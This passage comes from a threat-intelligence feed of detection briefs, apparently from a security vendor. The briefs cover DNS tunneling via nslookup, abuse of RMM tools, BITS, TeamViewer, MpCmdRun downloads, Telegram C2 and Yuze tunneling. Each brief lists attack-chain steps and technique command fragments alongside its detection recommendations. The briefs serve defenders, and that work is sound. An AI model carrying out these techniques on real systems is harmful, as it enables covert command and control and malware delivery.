bypass traditional security controls that monitor standard network traffic, enabling covert communication channels.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a host within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003enslookup.exe\u003c/code\u003e to perform DNS queries with specific query types (e.g., \u003ccode\u003e-querytype=TXT\u003c/code\u003e, \u003ccode\u003e-qt=A\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker encodes data (commands, files, or exfiltrated data) into the DNS query.\u003c/li\u003e\n\u003cli\u003eThe compromised host sends multiple DNS requests to a rogue DNS server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the DNS queries and decodes the data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the tunneled command to further compromise the internal network.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates data to the attacker-controlled server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful DNS tunneling allows attackers to establish covert communication channels, bypassing traditional security measures. This can lead to command and control of compromised systems, exfiltration of sensitive data, and further propagation within the network. The impact includes potential data breaches, system compromise, and prolonged attacker presence due to the difficulty in detecting covert DNS traffic.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Nslookup DNS Tunneling Activity\u0026rdquo; to your SIEM to detect potential DNS tunneling attempts.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture \u003ccode\u003enslookup.exe\u003c/code\u003e executions and their command-line arguments.\u003c/li\u003e\n\u003cli\u003eInspect network traffic logs for unusually high volumes of DNS queries originating from individual hosts.\u003c/li\u003e\n\u003cli\u003eMonitor DNS query logs for encoded or unusual data patterns within DNS query names.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-dns-tunneling-nslookup/","summary":"Detection of multiple nslookup.exe executions with explicit query types from a single host, potentially indicating command and control activity via DNS tunneling, where attackers abuse DNS for data infiltration or exfiltration.","title":"Potential DNS Tunneling via NsLookup","url":"https://feed.craftedsignal.io/briefs/2024-01-dns-tunneling-nslookup/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AeroAdmin","AnyDesk","AteraAgent","AweSun","APC Admin","APC Host","BeyondTrust Remote Support","Bomgar","Remote Support","B4-Service","CagService","Domotz Agent","dwagsvc","DWRCC","FleetDeck Commander","GetScreen","GoToAssist","GoToResolve","ImperoClient","ImperoServer","ISLLight","ISLLightClient","JumpCloud Agent","Level","LvAgent","LMIIgnition","LogMeIn","Lunixar","ManageEngine Remote Access Plus","MeshAgent","Mikogo","NinjaRMM","parsec","PService","Radmin","RealVNC","RemotePC","RemoteDesktopManager","RCClient","RCService","RPCSuite","RustDesk","RemoteUtilities","saazapsc","ScreenConnect","Splashtop","Supremo","Syncro","TacticalRMM","Tailscale","TeamViewer","Tiflux","ToDesk","Twingate","TightVNC","UltraVNC","UltraViewer","AnyAssist","Velociraptor","ToolsIQ","ZohoAssist"],"_cs_severities":["medium"],"_cs_tags":["remote-access-tool","command-and-control","rmm","windows"],"_cs_type":"advisory","_cs_vendors":["AeroAdmin","AnyDesk","Atera","AweSun","APC","BeyondTrust","BarracudaRMM","Domotz","DWService","FleetDeck","GetScreen","GoTo","Impero","ISLOnline","JumpCloud","Level","LogMeIn","Lunixar","ManageEngine","MeshCentral","Mikogo","NinjaOne","Parsec","Pulseway","Radmin","RealVNC","RemotePC","Devolutions","RPCSuite","RustDesk","RemoteUtilities","Kaseya","ScreenConnect","Splashtop","Supremo","TacticalRMM","Tailscale","TeamViewer","Tiflux","ToDesk","Twingate","TightVNC","UltraVNC","UltraViewer","AnyAssist","Velociraptor","ToolsIQ","ZohoAssist"],"content_html":"\u003cp\u003eThis detection rule identifies Windows systems running multiple Remote Monitoring and Management (RMM) tools from different vendors within an eight-minute timeframe. While legitimate MSP environments might utilize several tools, the presence of multiple RMM solutions on a single host can signify a compromise, unauthorized software installation (shadow IT), or attackers establishing redundant access points. The rule maps process names to vendor labels to avoid inflated counts from multiple binaries of the same vendor. This activity has been observed as a component of broader attack campaigns, including those leveraging compromised MSP infrastructure, and is described in CISA AA23-025A. The timeframe analyzed is \u0026ldquo;now-9m\u0026rdquo;, and the rule triggers if two or more different vendors are detected.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: The attacker gains initial access to the system, possibly through phishing, exploiting vulnerabilities, or stolen credentials.\u003c/li\u003e\n\u003cli\u003eTool Deployment: The attacker deploys an initial RMM tool (e.g., AnyDesk, TeamViewer) for remote access and control.\u003c/li\u003e\n\u003cli\u003ePersistence: The attacker establishes persistence by configuring the RMM tool to start automatically on system boot.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The attacker uses the initial access to discover other systems on the network.\u003c/li\u003e\n\u003cli\u003eAdditional RMM Deployment: The attacker deploys a second RMM tool (e.g., ScreenConnect, Splashtop) from a different vendor to create a redundant access method.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation: The attacker escalates privileges using the compromised RMM tools, if necessary.\u003c/li\u003e\n\u003cli\u003eRemote Control: The attacker uses the RMM tools to remotely control the system, execute commands, and access sensitive data.\u003c/li\u003e\n\u003cli\u003eData Exfiltration or Further Exploitation: The attacker exfiltrates sensitive data or uses the compromised system to launch further attacks on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack leveraging multiple RMM tools can result in unauthorized access to sensitive data, system compromise, and lateral movement within the network. The presence of multiple RMM tools increases the attacker\u0026rsquo;s resilience, making it harder to detect and remediate the intrusion. Affected systems can be used as a staging ground for further attacks, leading to significant financial and reputational damage. This can impact any Windows-based system, and the CISA advisory AA23-025A specifically highlights the risk of MSP infrastructure compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMultiple RMM Vendors on Same Host\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate hosts triggering the rule to confirm legitimate use of multiple RMM tools. Check \u003ccode\u003eEsql.vendors_seen\u003c/code\u003e and \u003ccode\u003eEsql.processes_name_values\u003c/code\u003e for insight into the involved tools.\u003c/li\u003e\n\u003cli\u003eReview asset inventory and change tickets to verify authorized RMM software installations.\u003c/li\u003e\n\u003cli\u003eIsolate any unauthorized or unexplained hosts and remove unapproved RMM tools.\u003c/li\u003e\n\u003cli\u003eEnforce a single approved RMM stack per asset class where possible.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) on Windows endpoints to enhance detection capabilities as described in the rule\u0026rsquo;s setup instructions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-multiple-rmm-vendors/","summary":"This rule identifies Windows hosts where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window, potentially indicating compromise, shadow IT, or attacker staging of redundant access.","title":"Multiple Remote Management Tool Vendors on Same Host","url":"https://feed.craftedsignal.io/briefs/2024-01-multiple-rmm-vendors/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Background Intelligent Transfer Service (BITS)","Adobe Reader","Docker Desktop"],"_cs_severities":["low"],"_cs_tags":["bits","ingress-transfer","command-and-control","defense-evasion","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Adobe","Docker"],"content_html":"\u003cp\u003eThe Windows Background Intelligent Transfer Service (BITS) is a legitimate Windows service that allows for prioritized, asynchronous, and throttled transfer of files between a client and a server. Adversaries abuse BITS to download malicious payloads while evading typical security protections, as file transfers occur in the context of the \u003ccode\u003esvchost.exe\u003c/code\u003e process. This activity can obscure the origin of the download and bypass application whitelisting rules. This detection focuses on identifying file rename events where \u003ccode\u003esvchost.exe\u003c/code\u003e renames temporary BITS files (BIT*.tmp) to executable or archive file types, indicating a potential malicious download via BITS. This technique is commonly employed to deliver malware, exfiltrate data, or download additional tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses a script or command-line interface (e.g., PowerShell) to create a BITS job.\u003c/li\u003e\n\u003cli\u003eThe BITS job is configured to download a malicious executable or archive from a remote server using the \u003ccode\u003ebitsadmin.exe\u003c/code\u003e utility.\u003c/li\u003e\n\u003cli\u003eBITS downloads the file to a temporary location on the system with a \u003ccode\u003eBIT*.tmp\u003c/code\u003e extension.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esvchost.exe\u003c/code\u003e process renames the temporary file to its final name and extension (e.g., .exe, .zip).\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded file, initiating further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe malware establishes persistence through registry keys or scheduled tasks.\u003c/li\u003e\n\u003cli\u003eThe malware communicates with a command and control (C2) server to receive instructions and exfiltrate data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation enables attackers to download and execute arbitrary code on compromised systems. The use of BITS can bypass traditional security measures, leading to malware infections, data theft, and potentially full system compromise. This technique can be used in conjunction with other attack vectors to establish a persistent foothold within the network. While the rule itself triggers at low severity, the identified activity can be an early warning of more severe attack stages.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Ingress Transfer via Windows BITS\u0026rdquo; Sigma rule to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon file creation and process creation logging to enhance visibility into BITS-related activities.\u003c/li\u003e\n\u003cli\u003eMonitor network connections initiated by \u003ccode\u003esvchost.exe\u003c/code\u003e to identify potentially malicious downloads.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of \u003ccode\u003ebitsadmin.exe\u003c/code\u003e being executed, especially with command-line arguments indicative of suspicious downloads.\u003c/li\u003e\n\u003cli\u003eReview \u003ccode\u003eMicrosoft-Windows-Bits-Client/Operational\u003c/code\u003e Windows logs (event ID 59) for unusual BITS events.\u003c/li\u003e\n\u003cli\u003eBlock known malicious domains or IP addresses associated with BITS-related attacks at the firewall or DNS resolver.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-bits-ingress-transfer/","summary":"Adversaries may leverage Windows Background Intelligent Transfer Service (BITS) to download executable and archive files to evade defenses and establish command and control.","title":"Ingress Transfer via Windows BITS","url":"https://feed.craftedsignal.io/briefs/2024-01-bits-ingress-transfer/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud"],"_cs_severities":["high"],"_cs_tags":["telegram","command-and-control","dns","windows"],"_cs_type":"advisory","_cs_vendors":["Splunk"],"content_html":"\u003cp\u003eThis alert identifies systems querying the Telegram API domain (api.telegram.org) using processes other than the legitimate Telegram application. Threat actors frequently leverage Telegram bots for C2, due to their ease of use, encryption, and widespread availability. Malware can use these bots to receive commands, exfiltrate data, or perform other malicious activities. Detecting DNS queries for Telegram\u0026rsquo;s API from unexpected processes can uncover compromised systems or unauthorized use of Telegram for covert communication. The detection focuses on non-standard Telegram clients resolving the api.telegram.org domain to filter out legitimate Telegram application traffic and focus on suspicious processes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user inadvertently downloads and executes a malicious payload (e.g., via phishing or drive-by download).\u003c/li\u003e\n\u003cli\u003eThe malware establishes persistence on the system (e.g., via registry keys or scheduled tasks).\u003c/li\u003e\n\u003cli\u003eThe malware initiates a DNS query to resolve api.telegram.org to identify the Telegram API server IP address.\u003c/li\u003e\n\u003cli\u003eThe malware establishes a communication channel with a Telegram bot controlled by the attacker using the resolved IP address.\u003c/li\u003e\n\u003cli\u003eThe attacker sends commands to the bot, which are relayed to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe malware executes the received commands, potentially including data exfiltration or further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malware exfiltrates sensitive data to the attacker via the Telegram bot.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access and control over the compromised system via the Telegram bot.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems can be remotely controlled by attackers, leading to data theft, system disruption, or further propagation of malware within the network. The use of Telegram bots enables covert communication, making it difficult to detect malicious activity using traditional methods. Multiple threat actors employ Telegram-based C2, including those associated with information stealers, keyloggers, and crypto-mining malware. A successful attack can lead to significant data breaches and financial losses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Telegram DNS Queries\u003c/code\u003e to your SIEM to identify processes making DNS queries to the Telegram API (api.telegram.org) other than the legitimate Telegram application.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by examining the process execution history, network connections, and related system activity.\u003c/li\u003e\n\u003cli\u003eBlock the domain \u003ccode\u003eapi.telegram.org\u003c/code\u003e at the DNS resolver or firewall to prevent compromised systems from communicating with Telegram bots, unless legitimate business use requires it.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 22 (DNS Query) logging to capture DNS query events on endpoints.\u003c/li\u003e\n\u003cli\u003eUpdate Sysmon to at least version 6.0.4 to ensure comprehensive DNS event logging.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-telegram-dns-query/","summary":"Detection of a process making DNS queries to the Telegram API domain, which is indicative of malware utilizing Telegram bots for command and control (C2) communications.","title":"Suspicious DNS Queries to Telegram API by Non-Telegram Processes","url":"https://feed.craftedsignal.io/briefs/2024-01-03-telegram-dns-query/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","TeamViewer"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","remote-access","teamviewer"],"_cs_type":"advisory","_cs_vendors":["Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers sometimes transfer malicious tools into a compromised environment using the command and control channel, but they also abuse legitimate utilities like TeamViewer to drop these files. TeamViewer is a remote access and control tool frequently used by help desks and system administrators for support activities; however, attackers and scammers also leverage it to deploy malware and conduct other malicious activities. This detection identifies instances of the TeamViewer process creating files with suspicious extensions on Windows systems, indicating potential misuse of the tool for unauthorized file transfers. The rule is designed to detect suspicious remote file copies during TeamViewer sessions, focusing on files with extensions commonly associated with executables and scripts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system through various means.\u003c/li\u003e\n\u003cli\u003eThe attacker installs or leverages an existing TeamViewer instance on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a remote connection to the compromised system using TeamViewer.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates a file transfer session within TeamViewer.\u003c/li\u003e\n\u003cli\u003eThe attacker transfers a malicious executable or script file (e.g., .exe, .dll, .ps1) to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe transferred file is saved to a location on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the transferred file, leading to further malicious activities such as malware installation or command execution.\u003c/li\u003e\n\u003cli\u003eThe attacker performs post-exploitation activities, like lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation via remote file copy can lead to the introduction of malware into the targeted environment, potentially compromising sensitive data and causing significant operational disruption. The severity of the impact depends on the nature of the transferred file and the subsequent actions performed by the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eTeamViewer Remote File Copy\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule by examining process execution chains and file origins.\u003c/li\u003e\n\u003cli\u003eBlock the file extensions listed in the \u003ccode\u003efile.extension\u003c/code\u003e field in the query at the network level to prevent the transfer of potentially malicious files.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend or SentinelOne Cloud Funnel to collect the necessary file creation events to trigger the detection.\u003c/li\u003e\n\u003cli\u003eReview TeamViewer usage within your organization and restrict its use to authorized personnel only.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-teamviewer-file-copy/","summary":"Attackers may abuse legitimate utilities such as TeamViewer to deploy malware interactively by remotely copying executable or script files during a TeamViewer session.","title":"Remote File Copy via TeamViewer","url":"https://feed.craftedsignal.io/briefs/2024-01-teamviewer-file-copy/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Defender"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","ingress-tool-transfer","windows","mpcmdrun"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are leveraging the built-in Windows Defender command-line utility, \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e, to download files from remote locations. This technique allows attackers to bypass traditional download restrictions and blend in with legitimate system activity. The \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e utility is normally used to manage Windows Defender settings and perform tasks such as signature updates and scans. However, its \u003ccode\u003e-DownloadFile\u003c/code\u003e parameter can be abused to download arbitrary files from a specified URL. This activity was first publicly reported around September 2020. Defenders should monitor for unusual usage patterns of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e, especially those involving command-line arguments related to file downloads from external sources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a target system through an unrelated vulnerability or existing compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e to download a file from a remote server. The command includes arguments like \u003ccode\u003e-DownloadFile\u003c/code\u003e, \u003ccode\u003e-url\u003c/code\u003e, and \u003ccode\u003e-path\u003c/code\u003e to specify the download location and save path.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to a location on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded file. This could be a malicious executable, a script, or a configuration file.\u003c/li\u003e\n\u003cli\u003eThe executed file performs further malicious actions on the system, such as establishing persistence, escalating privileges, or deploying additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system as a foothold to move laterally within the network, compromising other systems and resources.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their ultimate objective, such as data exfiltration, ransomware deployment, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to introduce arbitrary malicious code into the system, potentially leading to a wide range of adverse effects, including data theft, system compromise, and disruption of operations. While individual cases may be limited in scope, widespread exploitation could impact numerous organizations, resulting in significant financial losses and reputational damage. The use of a trusted system utility makes this technique harder to detect using traditional methods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMpCmdRun Remote File Download\u003c/code\u003e to your SIEM to detect the malicious use of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e for downloading files.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging with command-line arguments to provide the necessary data for the Sigma rule to function.\u003c/li\u003e\n\u003cli\u003eReview historical process execution logs for instances of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e being used with the \u003ccode\u003e-DownloadFile\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables downloaded by \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-mpcmdrun-remote-file-copy/","summary":"Attackers are abusing the Windows Defender MpCmdRun.exe utility to download remote files, potentially delivering malware or offensive tools into compromised systems.","title":"MpCmdRun.exe Used for Remote File Download","url":"https://feed.craftedsignal.io/briefs/2024-01-03-mpcmdrun-remote-file-copy/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","Excel","MS Access","MS Publisher","PowerPoint","Word","Outlook"],"_cs_severities":["low"],"_cs_tags":["command-prompt","network-connection","windows","execution","command-and-control"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies suspicious network connections initiated by the command prompt (cmd.exe) on Windows systems. The rule focuses on cmd.exe processes executed with specific arguments, such as those indicating script execution (e.g., *.bat, *.cmd), access to remote resources (e.g., URLs), or those spawned by Microsoft Office applications (Excel, Word, etc.). Attackers frequently abuse cmd.exe to download malicious payloads, execute commands, or establish command and control channels. This detection aims to identify such potentially malicious activity by correlating process creation events with subsequent network connections. The rule excludes common private and reserved IP address ranges to reduce false positives. The targeted systems are Windows endpoints where adversaries attempt to leverage cmd.exe for malicious purposes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user opens a malicious document (e.g., Word, Excel) or executes a seemingly benign application.\u003c/li\u003e\n\u003cli\u003eThe document or application contains a macro or script that initiates a cmd.exe process.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process is launched with arguments indicating script execution (\u003ccode\u003e/c\u003c/code\u003e, \u003ccode\u003e/k\u003c/code\u003e) and referencing a remote resource (e.g., a URL) or a local batch file.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process attempts to download a payload from a remote server using protocols like HTTP, HTTPS, or FTP.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with a disguised filename.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process executes the downloaded payload, initiating further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malicious payload establishes a command and control (C2) channel with a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands to the compromised system, potentially leading to data exfiltration or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the compromise of Windows endpoints, potentially enabling attackers to download and execute malicious payloads, establish command and control channels, and perform further malicious activities such as data theft, lateral movement, or ransomware deployment. While this detection has a low severity, it serves as an early warning sign of potential compromise and should be investigated promptly.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the full context of cmd.exe executions.\u003c/li\u003e\n\u003cli\u003eMonitor network connections from cmd.exe processes, focusing on connections to external IP addresses, using a network monitoring solution.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious cmd.exe network connections.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on cmd.exe processes spawned by Office applications or those executing scripts from remote URLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-suspicious-cmd-network/","summary":"This alert identifies suspicious network connections initiated by the command prompt (cmd.exe) when executed with arguments indicative of script execution, remote resource access, or originating from Microsoft Office applications, which is a common tactic for downloading payloads or establishing command and control.","title":"Suspicious Command Prompt Network Connection","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-cmd-network/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Elastic Endgame"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","tunneling","yuze","proxy"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule detects the execution of Yuze, an open-source tunneling tool written in C, which is commonly used for intranet penetration. Yuze supports both forward and reverse SOCKS5 proxy tunneling and is often executed using \u003ccode\u003erundll32\u003c/code\u003e to load \u003ccode\u003eyuze.dll\u003c/code\u003e with the \u003ccode\u003eRunYuze\u003c/code\u003e export. Threat actors can leverage Yuze to proxy command and control (C2) communications or to pivot within a network. The detection focuses on identifying processes with command-line arguments indicative of Yuze execution, specifically those involving \u0026ldquo;reverse,\u0026rdquo; \u0026ldquo;-c,\u0026rdquo; \u0026ldquo;proxy,\u0026rdquo; \u0026ldquo;fwd,\u0026rdquo; and \u0026ldquo;-l\u0026rdquo; parameters. This activity has been observed in real-world campaigns, increasing the importance of timely detection and response.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a target system through various means (e.g., phishing, exploitation of vulnerabilities).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads or drops the \u003ccode\u003eyuze.dll\u003c/code\u003e file onto the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003erundll32.exe\u003c/code\u003e to execute \u003ccode\u003eyuze.dll\u003c/code\u003e, calling the \u003ccode\u003eRunYuze\u003c/code\u003e export.\u003c/li\u003e\n\u003cli\u003eThe command line includes parameters to establish a reverse or forward SOCKS5 proxy tunnel (e.g., \u003ccode\u003erundll32 yuze.dll,RunYuze reverse -c \u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eYuze establishes a tunnel to a remote server, allowing the attacker to proxy network traffic.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established tunnel to pivot within the network and access internal resources.\u003c/li\u003e\n\u003cli\u003eThe attacker may proxy C2 traffic through the tunnel, masking the true origin of the commands.\u003c/li\u003e\n\u003cli\u003eThe attacker performs actions on the internal network, such as data exfiltration or lateral movement, using the tunnel as a covert channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to establish covert communication channels, bypass network security controls, and proxy malicious traffic, potentially leading to unauthorized access to sensitive data, lateral movement within the network, and data exfiltration. The use of Yuze can obscure the origin of attacks, making attribution more difficult and hindering incident response efforts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential Yuze Tunneling via Rundll32\u0026rdquo; to your SIEM to detect the execution of \u003ccode\u003eyuze.dll\u003c/code\u003e via \u003ccode\u003erundll32.exe\u003c/code\u003e with specific command-line arguments.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging (Sysmon Event ID 1 or Windows Security Auditing) to capture the necessary command-line information for the Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate any identified instances of \u003ccode\u003erundll32.exe\u003c/code\u003e executing \u003ccode\u003eyuze.dll\u003c/code\u003e, focusing on the parent processes and network connections.\u003c/li\u003e\n\u003cli\u003eBlock the C2/relay IP or domain found in the \u003ccode\u003e-c\u003c/code\u003e argument at DNS/firewall, as described in the Triage and Analysis section of the rule\u0026rsquo;s note.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-yuze-tunneling/","summary":"This alert detects potential protocol tunneling activity via the execution of Yuze, a lightweight open-source tunneling tool often used by threat actors for intranet penetration via forward and reverse SOCKS5 proxy tunneling.","title":"Potential Protocol Tunneling via Yuze","url":"https://feed.craftedsignal.io/briefs/2024-01-yuze-tunneling/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AeroAdmin","AnyDesk","Atera Agent","AweSun","APC Admin","APC Host","BeyondTrust","Remote Support","BarracudaRMM","Domotz Agent","DWService","FleetDeck Commander","GetScreen","GoTo","Impero Client","Impero Server","ISLLight","ISLLightClient","JumpCloud Agent","Level","LvAgent","LogMeIn","Lunixar","ManageEngine Remote Access 